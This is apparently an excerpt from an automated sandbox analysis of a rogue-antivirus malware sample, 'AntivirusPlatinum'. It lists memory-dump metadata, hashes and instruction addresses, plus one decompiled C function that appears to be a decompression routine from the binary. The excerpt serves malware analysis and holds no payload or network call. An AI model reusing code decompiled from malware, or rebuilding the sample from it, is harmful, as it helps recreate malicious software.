                                                                                                                                                  0x004015fe
                                                                                                                                                  0x00401600
                                                                                                                                                  0x00401605
                                                                                                                                                  0x00401607
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004015a9
                                                                                                                                                  0x004015af
                                                                                                                                                  0x004015b2
                                                                                                                                                  0x0040160b
                                                                                                                                                  0x0040160e
                                                                                                                                                  0x00401640
                                                                                                                                                  0x00401643
                                                                                                                                                  0x0040164f
                                                                                                                                                  0x00401655
                                                                                                                                                  0x0040165b
                                                                                                                                                  0x00401661
                                                                                                                                                  0x00401666
                                                                                                                                                  0x00401666
                                                                                                                                                  0x0040166d
                                                                                                                                                  0x00401678
                                                                                                                                                  0x00401683
                                                                                                                                                  0x0040168f
                                                                                                                                                  0x00401696
                                                                                                                                                  0x0040169b
                                                                                                                                                  0x0040169b
                                                                                                                                                  0x0040169d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040169d
                                                                                                                                                  0x0040166f
                                                                                                                                                  0x00401676
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401676
                                                                                                                                                  0x00401610
                                                                                                                                                  0x00401617
                                                                                                                                                  0x00401639
                                                                                                                                                  0x00401639
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401639
                                                                                                                                                  0x00401619
                                                                                                                                                  0x00401620
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401622
                                                                                                                                                  0x00401629
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401630
                                                                                                                                                  0x00401637
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401637
                                                                                                                                                  0x004015c0
                                                                                                                                                  0x004015c5
                                                                                                                                                  0x004015c7
                                                                                                                                                  0x004015c9
                                                                                                                                                  0x004015c9
                                                                                                                                                  0x004015d0
                                                                                                                                                  0x004015d7
                                                                                                                                                  0x004015f0
                                                                                                                                                  0x004015f0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004015d9
                                                                                                                                                  0x004015d9
                                                                                                                                                  0x004015e0
                                                                                                                                                  0x004015f7
                                                                                                                                                  0x004015f9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004015f9
                                                                                                                                                  0x004015e7
                                                                                                                                                  0x004015ee
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004015ee
                                                                                                                                                  0x004015d7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401609
                                                                                                                                                  0x00401571
                                                                                                                                                  0x00401573
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401573
                                                                                                                                                  0x00401553
                                                                                                                                                  0x00401559
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040155d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040155d
                                                                                                                                                  0x00401543
                                                                                                                                                  0x00401548
                                                                                                                                                  0x00401548
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00401548
                                                                                                                                                  0x004014b7
                                                                                                                                                  0x004014bb
                                                                                                                                                  0x004014c3
                                                                                                                                                  0x004014c8
                                                                                                                                                  0x004014cc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004014cc

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: CMT$|LA
                                                                                                                                                  • API String ID: 0-3111524465
                                                                                                                                                  • Opcode ID: c155400c815564dadfbf603a83f8382b3448e47e6a2f946495a97fe2ddafdf87
                                                                                                                                                  • Instruction ID: 3467558b02b3088dee00dca3edea15e6df14af65674381350c28196c55da78c7
                                                                                                                                                  • Opcode Fuzzy Hash: c155400c815564dadfbf603a83f8382b3448e47e6a2f946495a97fe2ddafdf87
                                                                                                                                                  • Instruction Fuzzy Hash: BC913870A047409EEB21DB7488057EBB7E59F11308F04087FD49AB72E2DB7E6945DB2A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                                  			E00410D74(intOrPtr* __ecx, signed int _a4, char _a7) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				signed int _v12;
                                                                                                                                                  				signed int _v16;
                                                                                                                                                  				void* __edi;
                                                                                                                                                  				intOrPtr _t105;
                                                                                                                                                  				char _t107;
                                                                                                                                                  				signed char _t110;
                                                                                                                                                  				unsigned int _t112;
                                                                                                                                                  				signed int _t115;
                                                                                                                                                  				signed int _t116;
                                                                                                                                                  				signed int _t117;
                                                                                                                                                  				void* _t119;
                                                                                                                                                  				signed int _t120;
                                                                                                                                                  				unsigned int _t121;
                                                                                                                                                  				signed int _t124;
                                                                                                                                                  				signed int _t125;
                                                                                                                                                  				void* _t126;
                                                                                                                                                  				void* _t127;
                                                                                                                                                  				void* _t128;
                                                                                                                                                  				signed int _t130;
                                                                                                                                                  				unsigned int _t132;
                                                                                                                                                  				signed int _t135;
                                                                                                                                                  				signed int _t136;
                                                                                                                                                  				signed int _t137;
                                                                                                                                                  				intOrPtr _t139;
                                                                                                                                                  				unsigned int _t141;
                                                                                                                                                  				signed int _t145;
                                                                                                                                                  				signed int _t146;
                                                                                                                                                  				unsigned int _t147;
                                                                                                                                                  				signed int _t150;
                                                                                                                                                  				signed int _t151;
                                                                                                                                                  				void* _t155;
                                                                                                                                                  				void* _t156;
                                                                                                                                                  				signed char _t157;
                                                                                                                                                  				signed int _t158;
                                                                                                                                                  				intOrPtr _t161;
                                                                                                                                                  				intOrPtr _t167;
                                                                                                                                                  				signed int _t169;
                                                                                                                                                  				char _t170;
                                                                                                                                                  				signed int _t171;
                                                                                                                                                  				intOrPtr _t172;
                                                                                                                                                  				signed int _t173;
                                                                                                                                                  				signed int _t174;
                                                                                                                                                  				signed int _t175;
                                                                                                                                                  				signed int _t179;
                                                                                                                                                  				void* _t187;
                                                                                                                                                  				signed int _t191;
                                                                                                                                                  				void* _t194;
                                                                                                                                                  				void* _t203;
                                                                                                                                                  				void* _t209;
                                                                                                                                                  				void* _t214;
                                                                                                                                                  				void* _t232;
                                                                                                                                                  				signed int _t236;
                                                                                                                                                  				intOrPtr _t239;
                                                                                                                                                  				signed char _t242;
                                                                                                                                                  				signed char _t244;
                                                                                                                                                  				signed int _t248;
                                                                                                                                                  				intOrPtr* _t249;
                                                                                                                                                  				void* _t250;
                                                                                                                                                  				void* _t251;
                                                                                                                                                  				void* _t266;
                                                                                                                                                  
                                                                                                                                                  				_t169 = 0;
                                                                                                                                                  				_t249 = __ecx;
                                                                                                                                                  				_t251 =  *0x41ff04 - _t169; // 0x1
                                                                                                                                                  				if(_t251 != 0) {
                                                                                                                                                  					L6:
                                                                                                                                                  					 *((char*)(_t249 + 0x5778)) = 1;
                                                                                                                                                  					if( *((char*)(_t249 + 0x5768)) != 0) {
                                                                                                                                                  						while(1) {
                                                                                                                                                  							L11:
                                                                                                                                                  							 *(_t249 + 0x55b0) =  *(_t249 + 0x55b0) & 0x003fffff;
                                                                                                                                                  							if( *_t249 >  *((intOrPtr*)(_t249 + 0x55bc)) && E0040E95B(_t249, _t235) == 0) {
                                                                                                                                                  								break;
                                                                                                                                                  							}
                                                                                                                                                  							_t105 =  *((intOrPtr*)(_t249 + 0x55b4));
                                                                                                                                                  							_t179 =  *(_t249 + 0x55b0);
                                                                                                                                                  							_t235 = _t105 - _t179 & 0x003fffff;
                                                                                                                                                  							if((_t105 - _t179 & 0x003fffff) >= 0x104 || _t105 == _t179) {
                                                                                                                                                  								L19:
                                                                                                                                                  								if( *(_t249 + 0x5754) != 1) {
                                                                                                                                                  									_t107 = E0040FA07(_t249, _t235, __eflags, _t249 + 0x4c60);
                                                                                                                                                  									_t235 = 0x100;
                                                                                                                                                  									__eflags = _t107 - 0x100;
                                                                                                                                                  									if(__eflags >= 0) {
                                                                                                                                                  										__eflags = _t107 - 0x10f;
                                                                                                                                                  										if(_t107 < 0x10f) {
                                                                                                                                                  											__eflags = _t107 - 0x100;
                                                                                                                                                  											if(__eflags != 0) {
                                                                                                                                                  												__eflags = _t107 - 0x101;
                                                                                                                                                  												if(__eflags != 0) {
                                                                                                                                                  													__eflags = _t107 - 0x102;
                                                                                                                                                  													if(_t107 != 0x102) {
                                                                                                                                                  														__eflags = _t107 - 0x107;
                                                                                                                                                  														if(_t107 >= 0x107) {
                                                                                                                                                  															__eflags = _t107 - 0x110;
                                                                                                                                                  															if(__eflags >= 0) {
                                                                                                                                                  																continue;
                                                                                                                                                  															}
                                                                                                                                                  															_t94 = _t107 + 0x41401d; // 0x29292929
                                                                                                                                                  															_t95 = _t107 + 0x414015; // 0x9454529
                                                                                                                                                  															_t171 =  *_t95 & 0x000000ff;
                                                                                                                                                  															_t239 = ( *_t94 & 0x000000ff) + 1;
                                                                                                                                                  															__eflags = _t171;
                                                                                                                                                  															if(_t171 > 0) {
                                                                                                                                                  																_t112 = E004060BE(_t249);
                                                                                                                                                  																_t187 = 0x10;
                                                                                                                                                  																_t239 = _t239 + (_t112 >> _t187 - _t171);
                                                                                                                                                  																_t115 =  *(_t249 + 4) + _t171;
                                                                                                                                                  																 *_t249 =  *_t249 + (_t115 >> 3);
                                                                                                                                                  																_t116 = _t115 & 0x00000007;
                                                                                                                                                  																__eflags = _t116;
                                                                                                                                                  																 *(_t249 + 4) = _t116;
                                                                                                                                                  															}
                                                                                                                                                  															E0040E867(_t249, _t239);
                                                                                                                                                  															_t110 = 2;
                                                                                                                                                  															L84:
                                                                                                                                                  															 *((intOrPtr*)(_t249 + 0x55a8)) = _t239;
                                                                                                                                                  															 *(_t249 + 0x55ac) = _t110;
                                                                                                                                                  															_push(_t239);
                                                                                                                                                  															L85:
                                                                                                                                                  															_push(_t110);
                                                                                                                                                  															L86:
                                                                                                                                                  															E0040E894(_t249);
                                                                                                                                                  															continue;
                                                                                                                                                  														}
                                                                                                                                                  														_t117 = _t107 + 0xfffffefd;
                                                                                                                                                  														_t191 = _t249 + 0x5594 + _t117 * 4;
                                                                                                                                                  														_t172 =  *_t191;
                                                                                                                                                  														while(1) {
                                                                                                                                                  															__eflags = _t117;
                                                                                                                                                  															if(__eflags <= 0) {
                                                                                                                                                  																break;
                                                                                                                                                  															}
                                                                                                                                                  															_t235 =  *(_t191 - 4);
                                                                                                                                                  															 *_t191 =  *(_t191 - 4);
                                                                                                                                                  															_t117 = _t117 - 1;
                                                                                                                                                  															_t191 = _t191 - 4;
                                                                                                                                                  															__eflags = _t191;
                                                                                                                                                  														}
                                                                                                                                                  														 *((intOrPtr*)(_t249 + 0x5594)) = _t172;
                                                                                                                                                  														_t119 = E0040FA07(_t249, _t235, __eflags, _t249 + 0x53cc);
                                                                                                                                                  														_t85 = _t119 + 0x414148; // 0x3020100
                                                                                                                                                  														_t86 = _t119 + 0x41412c; // 0x0
                                                                                                                                                  														_t120 =  *_t86 & 0x000000ff;
                                                                                                                                                  														_t242 = ( *_t85 & 0x000000ff) + 2;
                                                                                                                                                  														_a4 = _t120;
                                                                                                                                                  														__eflags = _t120;
                                                                                                                                                  														if(_t120 > 0) {
                                                                                                                                                  															_t121 = E004060BE(_t249);
                                                                                                                                                  															_t194 = 0x10;
                                                                                                                                                  															_t242 = _t242 + (_t121 >> _t194 - _a4);
                                                                                                                                                  															_t124 =  *(_t249 + 4) + _a4;
                                                                                                                                                  															 *_t249 =  *_t249 + (_t124 >> 3);
                                                                                                                                                  															_t125 = _t124 & 0x00000007;
                                                                                                                                                  															__eflags = _t125;
                                                                                                                                                  															 *(_t249 + 4) = _t125;
                                                                                                                                                  														}
                                                                                                                                                  														_push(_t172);
                                                                                                                                                  														 *((intOrPtr*)(_t249 + 0x55a8)) = _t172;
                                                                                                                                                  														 *(_t249 + 0x55ac) = _t242;
                                                                                                                                                  														_push(_t242);
                                                                                                                                                  														goto L86;
                                                                                                                                                  													}
                                                                                                                                                  													_t110 =  *(_t249 + 0x55ac);
                                                                                                                                                  													__eflags = _t110;
                                                                                                                                                  													if(__eflags == 0) {
                                                                                                                                                  														continue;
                                                                                                                                                  													}
                                                                                                                                                  													_push( *((intOrPtr*)(_t249 + 0x55a8)));
                                                                                                                                                  													goto L85;
                                                                                                                                                  												}
                                                                                                                                                  												_t126 = E00410BBE(_t249, 0x100, __eflags); // executed
                                                                                                                                                  												L24:
                                                                                                                                                  												if(_t126 != 0) {
                                                                                                                                                  													continue;
                                                                                                                                                  												}
                                                                                                                                                  												break;
                                                                                                                                                  											}
                                                                                                                                                  											_t126 = E0041026D(_t249, __eflags);
                                                                                                                                                  											goto L24;
                                                                                                                                                  										}
                                                                                                                                                  										_t128 = _t107 - 0x10f;
                                                                                                                                                  										_t50 = _t128 + 0x414148; // 0x3020100
                                                                                                                                                  										_t51 = _t128 + 0x41412c; // 0x0
                                                                                                                                                  										_t173 =  *_t51 & 0x000000ff;
                                                                                                                                                  										_t244 = ( *_t50 & 0x000000ff) + 3;
                                                                                                                                                  										_a4 = _t244;
                                                                                                                                                  										__eflags = _t173;
                                                                                                                                                  										if(__eflags > 0) {
                                                                                                                                                  											_t147 = E004060BE(_t249);
                                                                                                                                                  											_t214 = 0x10;
                                                                                                                                                  											_t150 =  *(_t249 + 4) + _t173;
                                                                                                                                                  											 *_t249 =  *_t249 + (_t150 >> 3);
                                                                                                                                                  											_t151 = _t150 & 0x00000007;
                                                                                                                                                  											__eflags = _t151;
                                                                                                                                                  											_a4 = _t244 + (_t147 >> _t214 - _t173);
                                                                                                                                                  											 *(_t249 + 4) = _t151;
                                                                                                                                                  										}
                                                                                                                                                  										_t130 = E0040FA07(_t249, _t235, __eflags, _t249 + 0x5190);
                                                                                                                                                  										_t57 = _t130 + 0x41fec4; // 0x0
                                                                                                                                                  										_t174 =  *_t57 & 0x000000ff;
                                                                                                                                                  										_t239 =  *((intOrPtr*)(0x41ff00 + _t130 * 4)) + 1;
                                                                                                                                                  										__eflags = _t174;
                                                                                                                                                  										if(_t174 <= 0) {
                                                                                                                                                  											L62:
                                                                                                                                                  											__eflags = _t239 - 0x2000;
                                                                                                                                                  											if(_t239 >= 0x2000) {
                                                                                                                                                  												_a4 = _a4 + 1;
                                                                                                                                                  												__eflags = _t239 - 0x40000;
                                                                                                                                                  												if(_t239 >= 0x40000) {
                                                                                                                                                  													_t74 =  &_a4;
                                                                                                                                                  													 *_t74 = _a4 + 1;
                                                                                                                                                  													__eflags =  *_t74;
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  											E0040E867(_t249, _t239);
                                                                                                                                                  											_t110 = _a4;
                                                                                                                                                  											goto L84;
                                                                                                                                                  										} else {
                                                                                                                                                  											__eflags = _t130 - 9;
                                                                                                                                                  											if(_t130 <= 9) {
                                                                                                                                                  												_t132 = E004060BE(_t249);
                                                                                                                                                  												_t203 = 0x10;
                                                                                                                                                  												_t239 = _t239 + (_t132 >> _t203 - _t174);
                                                                                                                                                  												_t135 =  *(_t249 + 4) + _t174;
                                                                                                                                                  												 *_t249 =  *_t249 + (_t135 >> 3);
                                                                                                                                                  												_t136 = _t135 & 0x00000007;
                                                                                                                                                  												__eflags = _t136;
                                                                                                                                                  												 *(_t249 + 4) = _t136;
                                                                                                                                                  												goto L62;
                                                                                                                                                  											}
                                                                                                                                                  											__eflags = _t174 - 4;
                                                                                                                                                  											if(_t174 > 4) {
                                                                                                                                                  												_t141 = E004060BE(_t249);
                                                                                                                                                  												_t209 = 0x14;
                                                                                                                                                  												_t239 = _t239 + (_t141 >> _t209 - _t174 << 4);
                                                                                                                                                  												_t145 =  *(_t249 + 4) + _t174 - 4;
                                                                                                                                                  												 *_t249 =  *_t249 + (_t145 >> 3);
                                                                                                                                                  												_t146 = _t145 & 0x00000007;
                                                                                                                                                  												__eflags = _t146;
                                                                                                                                                  												 *(_t249 + 4) = _t146;
                                                                                                                                                  											}
                                                                                                                                                  											_t137 =  *(_t249 + 0x5780);
                                                                                                                                                  											__eflags = _t137;
                                                                                                                                                  											if(__eflags <= 0) {
                                                                                                                                                  												_t139 = E0040FA07(_t249, _t235, __eflags, _t249 + 0x5304);
                                                                                                                                                  												__eflags = _t139 - 0x10;
                                                                                                                                                  												if(_t139 != 0x10) {
                                                                                                                                                  													_t239 = _t239 + _t139;
                                                                                                                                                  													 *((intOrPtr*)(_t249 + 0x577c)) = _t139;
                                                                                                                                                  													goto L62;
                                                                                                                                                  												}
                                                                                                                                                  												 *(_t249 + 0x5780) = 0xf;
                                                                                                                                                  												goto L59;
                                                                                                                                                  											} else {
                                                                                                                                                  												 *(_t249 + 0x5780) = _t137 - 1;
                                                                                                                                                  												L59:
                                                                                                                                                  												_t239 = _t239 +  *((intOrPtr*)(_t249 + 0x577c));
                                                                                                                                                  												goto L62;
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									_t235 =  *(_t249 + 0x55b0);
                                                                                                                                                  									 *((char*)( *((intOrPtr*)(_t249 + 0x5758)) +  *(_t249 + 0x55b0))) = _t107;
                                                                                                                                                  									L47:
                                                                                                                                                  									 *(_t249 + 0x55b0) =  *(_t249 + 0x55b0) + 1;
                                                                                                                                                  									continue;
                                                                                                                                                  								}
                                                                                                                                                  								_t247 = _t249 + 0x10;
                                                                                                                                                  								_t170 = E0040FC8D(_t249 + 0x10);
                                                                                                                                                  								if(_t170 == 0xffffffff) {
                                                                                                                                                  									E0040F9E1(_t249 + 0x10, _t235);
                                                                                                                                                  									_t102 = _t249 + 0x5754;
                                                                                                                                                  									 *_t102 =  *(_t249 + 0x5754) & 0x00000000;
                                                                                                                                                  									__eflags =  *_t102;
                                                                                                                                                  									break;
                                                                                                                                                  								}
                                                                                                                                                  								if(_t170 !=  *((intOrPtr*)(_t249 + 0x4bfc))) {
                                                                                                                                                  									L44:
                                                                                                                                                  									 *((char*)( *((intOrPtr*)(_t249 + 0x5758)) +  *(_t249 + 0x55b0))) = _t170;
                                                                                                                                                  									goto L47;
                                                                                                                                                  								}
                                                                                                                                                  								_t155 = E0040FC8D(_t247);
                                                                                                                                                  								if(_t155 != 0) {
                                                                                                                                                  									__eflags = _t155 - 2;
                                                                                                                                                  									if(_t155 == 2) {
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = _t155 - 0xffffffff;
                                                                                                                                                  									if(_t155 == 0xffffffff) {
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = _t155 - 3;
                                                                                                                                                  									if(_t155 != 3) {
                                                                                                                                                  										__eflags = _t155 - 4;
                                                                                                                                                  										if(_t155 != 4) {
                                                                                                                                                  											__eflags = _t155 - 5;
                                                                                                                                                  											if(__eflags != 0) {
                                                                                                                                                  												goto L44;
                                                                                                                                                  											}
                                                                                                                                                  											_t156 = E0040FC8D(_t247);
                                                                                                                                                  											__eflags = _t156 - 0xffffffff;
                                                                                                                                                  											if(_t156 == 0xffffffff) {
                                                                                                                                                  												break;
                                                                                                                                                  											}
                                                                                                                                                  											_push(1);
                                                                                                                                                  											_t110 = _t156 + 4;
                                                                                                                                                  											goto L85;
                                                                                                                                                  										}
                                                                                                                                                  										_t175 = 0;
                                                                                                                                                  										_a7 = 0;
                                                                                                                                                  										_t248 = 0;
                                                                                                                                                  										__eflags = 0;
                                                                                                                                                  										while(1) {
                                                                                                                                                  											__eflags = _a7;
                                                                                                                                                  											if(_a7 != 0) {
                                                                                                                                                  												goto L89;
                                                                                                                                                  											}
                                                                                                                                                  											_t157 = E0040FC8D(_t249 + 0x10);
                                                                                                                                                  											__eflags = _t157 - 0xffffffff;
                                                                                                                                                  											if(_t157 != 0xffffffff) {
                                                                                                                                                  												_t158 = _t157 & 0x000000ff;
                                                                                                                                                  												__eflags = _t248 - 3;
                                                                                                                                                  												if(_t248 != 3) {
                                                                                                                                                  													_t175 = (_t175 << 8) + _t158;
                                                                                                                                                  													__eflags = _t175;
                                                                                                                                                  												} else {
                                                                                                                                                  													_v16 = _t158;
                                                                                                                                                  												}
                                                                                                                                                  											} else {
                                                                                                                                                  												_a7 = 1;
                                                                                                                                                  											}
                                                                                                                                                  											_t248 = _t248 + 1;
                                                                                                                                                  											__eflags = _t248 - 4;
                                                                                                                                                  											if(_t248 < 4) {
                                                                                                                                                  												continue;
                                                                                                                                                  											} else {
                                                                                                                                                  												__eflags = _a7;
                                                                                                                                                  												if(_a7 != 0) {
                                                                                                                                                  													goto L89;
                                                                                                                                                  												}
                                                                                                                                                  												_push(_t175 + 2);
                                                                                                                                                  												_t110 = _v16 + 0x20;
                                                                                                                                                  												goto L85;
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									_t126 = E00410CB3(_t249);
                                                                                                                                                  									goto L24;
                                                                                                                                                  								}
                                                                                                                                                  								_t126 = E0040FF05(_t249, _t235);
                                                                                                                                                  								goto L24;
                                                                                                                                                  							} else {
                                                                                                                                                  								E00410748(_t249);
                                                                                                                                                  								_t161 =  *((intOrPtr*)(_t249 + 0x5774));
                                                                                                                                                  								_t266 = _t161 -  *((intOrPtr*)(_t249 + 0x5764));
                                                                                                                                                  								if(_t266 > 0) {
                                                                                                                                                  									L90:
                                                                                                                                                  									return _t161;
                                                                                                                                                  								}
                                                                                                                                                  								if(_t266 < 0) {
                                                                                                                                                  									L18:
                                                                                                                                                  									if( *((char*)(_t249 + 0x5768)) != 0) {
                                                                                                                                                  										 *((char*)(_t249 + 0x5778)) = 0;
                                                                                                                                                  										return _t161;
                                                                                                                                                  									}
                                                                                                                                                  									goto L19;
                                                                                                                                                  								}
                                                                                                                                                  								_t161 =  *((intOrPtr*)(_t249 + 0x5770));
                                                                                                                                                  								if(_t161 >  *((intOrPtr*)(_t249 + 0x5760))) {
                                                                                                                                                  									goto L90;
                                                                                                                                                  								}
                                                                                                                                                  								goto L18;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						L89:
                                                                                                                                                  						_t127 = E00410748(_t249); // executed
                                                                                                                                                  						return _t127;
                                                                                                                                                  					}
                                                                                                                                                  					E00410A90(_t249, _t236, _a4 & 0x000000ff);
                                                                                                                                                  					_t161 = E0040E95B(_t249, _t232);
                                                                                                                                                  					if(_t161 == 0) {
                                                                                                                                                  						goto L90;
                                                                                                                                                  					}
                                                                                                                                                  					if(_a4 == 0 ||  *((char*)(_t249 + 0x4c5c)) == 0) {
                                                                                                                                                  						_t161 = E0040FF05(_t249, _t232);
                                                                                                                                                  						if(_t161 == 0) {
                                                                                                                                                  							goto L90;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					goto L11;
                                                                                                                                                  				} else {
                                                                                                                                                  					_v12 = 0;
                                                                                                                                                  					_t236 = 0;
                                                                                                                                                  					do {
                                                                                                                                                  						_t235 =  *(0x414168 + _t169 * 4);
                                                                                                                                                  						if(_t235 <= 0) {
                                                                                                                                                  							goto L5;
                                                                                                                                                  						}
                                                                                                                                                  						_t4 = _t236 + 0x41fec4; // 0x41fec4
                                                                                                                                                  						_v8 = 1;
                                                                                                                                                  						_v8 = _v8 << _t169;
                                                                                                                                                  						_v16 = _t235;
                                                                                                                                                  						E0040A771(_t4, _t169, _t235);
                                                                                                                                                  						_t250 = _t250 + 0xc;
                                                                                                                                                  						do {
                                                                                                                                                  							_t167 = _v12;
                                                                                                                                                  							 *((intOrPtr*)(0x41ff00 + _t236 * 4)) = _t167;
                                                                                                                                                  							_t236 = _t236 + 1;
                                                                                                                                                  							_t13 =  &_v16;
                                                                                                                                                  							 *_t13 = _v16 - 1;
                                                                                                                                                  							_v12 = _t167 + _v8;
                                                                                                                                                  						} while ( *_t13 != 0);
                                                                                                                                                  						L5:
                                                                                                                                                  						_t169 = _t169 + 1;
                                                                                                                                                  					} while (_t169 < 0x13);
                                                                                                                                                  					goto L6;
                                                                                                                                                  				}
                                                                                                                                                  			}
































































                                                                                                                                                  0x00410d7c
                                                                                                                                                  0x00410d7f
                                                                                                                                                  0x00410d81
                                                                                                                                                  0x00410d87
                                                                                                                                                  0x00410dd5
                                                                                                                                                  0x00410ddc
                                                                                                                                                  0x00410de3
                                                                                                                                                  0x00410e1e
                                                                                                                                                  0x00410e1e
                                                                                                                                                  0x00410e25
                                                                                                                                                  0x00410e31
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00410e42
                                                                                                                                                  0x00410e48
                                                                                                                                                  0x00410e52
                                                                                                                                                  0x00410e5a
                                                                                                                                                  0x00410e9a
                                                                                                                                                  0x00410ea1
                                                                                                                                                  0x00410f9a
                                                                                                                                                  0x00410f9f
                                                                                                                                                  0x00410fa4
                                                                                                                                                  0x00410fa6
                                                                                                                                                  0x00410fc7
                                                                                                                                                  0x00410fc9
                                                                                                                                                  0x004110ee
                                                                                                                                                  0x004110f0
                                                                                                                                                  0x004110fe
                                                                                                                                                  0x00411103
                                                                                                                                                  0x00411111
                                                                                                                                                  0x00411116
                                                                                                                                                  0x00411131
                                                                                                                                                  0x00411136
                                                                                                                                                  0x004111b4
                                                                                                                                                  0x004111b9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004111bf
                                                                                                                                                  0x004111c6
                                                                                                                                                  0x004111c6
                                                                                                                                                  0x004111d2
                                                                                                                                                  0x004111d3
                                                                                                                                                  0x004111d5
                                                                                                                                                  0x004111d9
                                                                                                                                                  0x004111e0
                                                                                                                                                  0x004111e5
                                                                                                                                                  0x004111ea
                                                                                                                                                  0x004111f1
                                                                                                                                                  0x004111f3
                                                                                                                                                  0x004111f3
                                                                                                                                                  0x004111f6
                                                                                                                                                  0x004111f6
                                                                                                                                                  0x004111fc
                                                                                                                                                  0x00411203
                                                                                                                                                  0x00411204
                                                                                                                                                  0x00411204
                                                                                                                                                  0x0041120a
                                                                                                                                                  0x00411210
                                                                                                                                                  0x00411211
                                                                                                                                                  0x00411211
                                                                                                                                                  0x00411212
                                                                                                                                                  0x00411214
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00411214
                                                                                                                                                  0x00411138
                                                                                                                                                  0x0041113d
                                                                                                                                                  0x00411144
                                                                                                                                                  0x00411151
                                                                                                                                                  0x00411151
                                                                                                                                                  0x00411153
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00411148
                                                                                                                                                  0x0041114b
                                                                                                                                                  0x0041114d
                                                                                                                                                  0x0041114e
                                                                                                                                                  0x0041114e
                                                                                                                                                  0x0041114e
                                                                                                                                                  0x0041115e
                                                                                                                                                  0x00411164
                                                                                                                                                  0x00411169
                                                                                                                                                  0x00411170
                                                                                                                                                  0x00411170
                                                                                                                                                  0x00411178
                                                                                                                                                  0x00411179
                                                                                                                                                  0x0041117c
                                                                                                                                                  0x0041117e
                                                                                                                                                  0x00411182
                                                                                                                                                  0x00411189
                                                                                                                                                  0x0041118f
                                                                                                                                                  0x00411194
                                                                                                                                                  0x0041119c
                                                                                                                                                  0x0041119e
                                                                                                                                                  0x0041119e
                                                                                                                                                  0x004111a1
                                                                                                                                                  0x004111a1
                                                                                                                                                  0x004111a4
                                                                                                                                                  0x004111a5
                                                                                                                                                  0x004111ab
                                                                                                                                                  0x004111b1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004111b1
                                                                                                                                                  0x00411118
                                                                                                                                                  0x0041111e
                                                                                                                                                  0x00411120
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00411126
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00411126
                                                                                                                                                  0x00411107
                                                                                                                                                  0x00410eda
                                                                                                                                                  0x00410edc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00410ee2
                                                                                                                                                  0x004110f4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004110f4
                                                                                                                                                  0x00410fcf
                                                                                                                                                  0x00410fd1
                                                                                                                                                  0x00410fd8
                                                                                                                                                  0x00410fd8
                                                                                                                                                  0x00410fdf
                                                                                                                                                  0x00410fe2
                                                                                                                                                  0x00410fe5
                                                                                                                                                  0x00410fe7
                                                                                                                                                  0x00410feb
                                                                                                                                                  0x00410ff2
                                                                                                                                                  0x00410ffc
                                                                                                                                                  0x00411003
                                                                                                                                                  0x00411005
                                                                                                                                                  0x00411005
                                                                                                                                                  0x00411008
                                                                                                                                                  0x0041100b
                                                                                                                                                  0x0041100b
                                                                                                                                                  0x00411017
                                                                                                                                                  0x0041101c
                                                                                                                                                  0x0041101c
